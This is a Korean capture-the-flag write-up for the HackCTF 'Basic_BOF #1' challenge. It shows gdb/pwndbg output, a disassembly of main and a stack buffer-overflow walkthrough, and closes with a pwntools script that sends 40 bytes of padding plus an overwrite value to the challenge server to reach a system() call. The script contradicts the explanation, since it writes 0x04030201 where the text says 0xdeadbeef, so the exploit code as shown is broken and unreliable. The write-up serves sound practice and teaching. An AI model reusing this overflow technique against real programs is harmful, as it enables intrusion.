Hackctf Basic_BOF #1 Write-up
Basic_BOF # 1 문제이다.
파일을 다운받아 칼리에 넣었다.
root@C0WB3LL:~/Desktop/pwn# gdb bof_basic
GNU gdb (Debian 8.3.1-1) 8.3.1
Copyright (C) 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 180 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from bof_basic...
(No debugging symbols found in bof_basic)
pwndbg>
넣자마자 gdb를 돌린다.
pwndbg> i fu
All defined functions:
Non-debugging symbols:
0x08048330 _init
0x08048370 printf@plt
0x08048380 fgets@plt
0x08048390 puts@plt
0x080483a0 system@plt
0x080483b0 __libc_start_main@plt
0x080483c0 __gmon_start__@plt
0x080483d0 _start
0x08048400 __x86.get_pc_thunk.bx
0x08048410 deregister_tm_clones
0x08048440 register_tm_clones
0x08048480 __do_global_dtors_aux
0x080484a0 frame_dummy
0x080484cb main
0x08048590 __libc_csu_init
0x080485f0 __libc_csu_fini
0x080485f4 _fini
pwndbg>
i fu 명령어로 함수에 대한 정보를 확인한다. 특별한게 없으니 바로 main 함수를 파헤쳐 보자.
pwndbg> disas main
Dump of assembler code for function main:
0x080484cb <+0>: lea ecx,[esp+0x4]
0x080484cf <+4>: and esp,0xfffffff0
0x080484d2 <+7>: push DWORD PTR [ecx-0x4]
0x080484d5 <+10>: push ebp
0x080484d6 <+11>: mov ebp,esp
0x080484d8 <+13>: push ecx
0x080484d9 <+14>: sub esp,0x34
0x080484dc <+17>: mov DWORD PTR [ebp-0xc],0x4030201
0x080484e3 <+24>: mov eax,ds:0x804a040
0x080484e8 <+29>: sub esp,0x4
0x080484eb <+32>: push eax
0x080484ec <+33>: push 0x2d
0x080484ee <+35>: lea eax,[ebp-0x34]
0x080484f1 <+38>: push eax
0x080484f2 <+39>: call 0x8048380 <fgets@plt>
0x080484f7 <+44>: add esp,0x10
0x080484fa <+47>: sub esp,0x8
0x080484fd <+50>: lea eax,[ebp-0x34]
0x08048500 <+53>: push eax
0x08048501 <+54>: push 0x8048610
0x08048506 <+59>: call 0x8048370 <printf@plt>
0x0804850b <+64>: add esp,0x10
0x0804850e <+67>: sub esp,0x8
0x08048511 <+70>: push DWORD PTR [ebp-0xc]
0x08048514 <+73>: push 0x804861c
0x08048519 <+78>: call 0x8048370 <printf@plt>
0x0804851e <+83>: add esp,0x10
0x08048521 <+86>: cmp DWORD PTR [ebp-0xc],0x4030201
0x08048528 <+93>: je 0x8048543 <main+120>
0x0804852a <+95>: cmp DWORD PTR [ebp-0xc],0xdeadbeef
0x08048531 <+102>: je 0x8048543 <main+120>
0x08048533 <+104>: sub esp,0xc
0x08048536 <+107>: push 0x8048628
0x0804853b <+112>: call 0x8048390 <puts@plt>
0x08048540 <+117>: add esp,0x10
0x08048543 <+120>: cmp DWORD PTR [ebp-0xc],0xdeadbeef
0x0804854a <+127>: jne 0x804857c <main+177>
0x0804854c <+129>: sub esp,0xc
0x0804854f <+132>: push 0x8048644
0x08048554 <+137>: call 0x8048390 <puts@plt>
0x08048559 <+142>: add esp,0x10
0x0804855c <+145>: sub esp,0xc
0x0804855f <+148>: push 0x804866e
0x08048564 <+153>: call 0x80483a0 <system@plt>
0x08048569 <+158>: add esp,0x10
0x0804856c <+161>: sub esp,0xc
0x0804856f <+164>: push 0x8048678
0x08048574 <+169>: call 0x8048390 <puts@plt>
0x08048579 <+174>: add esp,0x10
0x0804857c <+177>: mov eax,0x0
0x08048581 <+182>: mov ecx,DWORD PTR [ebp-0x4]
0x08048584 <+185>: leave
0x08048585 <+186>: lea esp,[ecx-0x4]
0x08048588 <+189>: ret
End of assembler dump.
pwndbg>
간단하게 요약하자면 ebp-0xc 와 0xdeadbeef를 비교하여 참이면 system 함수를 불러오는 구조이다.
fgets함수로 입력은 ebp-0x34부터 받는다. 0x34 - 0xc = 0x28 = 40
따라서 A를 40byte만큼 입력한뒤 deadbeef로 덮으면 된다.
페이로드 : "A"*40 + p32(deadbeef)
pwntools.py
from pwn import *
p = remote("ctf.j0n9hyun.xyz",3000)
flag = 0x04030201
payload = "A"*40 + p32(flag)
p.sendline(payload)
p.interactive()
Flag : 안알랴줄거임 ㅎ 풀어보세요 모두~ (이래놓고 어짜피 구글링하면 다 나옴)